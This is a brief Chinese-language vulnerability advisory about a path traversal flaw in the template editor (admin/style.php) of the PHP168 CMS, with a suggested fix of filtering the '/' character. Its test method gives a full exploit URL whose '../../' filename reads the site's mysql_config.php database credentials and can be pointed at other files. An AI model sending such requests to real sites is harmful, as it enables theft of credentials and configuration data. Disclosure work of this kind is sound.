影响版本:
PHP168所有带模板编辑的版本
漏洞描述:
PHP168整站系统一直以来受广大用户的亲睐,它凭借着自身的强大、稳定、安全、灵活、易用等多方面的优势 ... 架构与功能的不断完善,让PHP168成为了最主流CMS系统之一。 由于admin/style.php代码过滤不严,存在漏洞
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
要求能进入网站后台 http://网站地址/后台目录/index.php?lfj=style&job=editcode&keywords=default&filename=../../php168/mysql_config.php 可以获取网站php168/mysql_config.php配置信息,当然也可以换成别的
安全建议:
临时解决办法:
过滤“/”符号
0 条评论。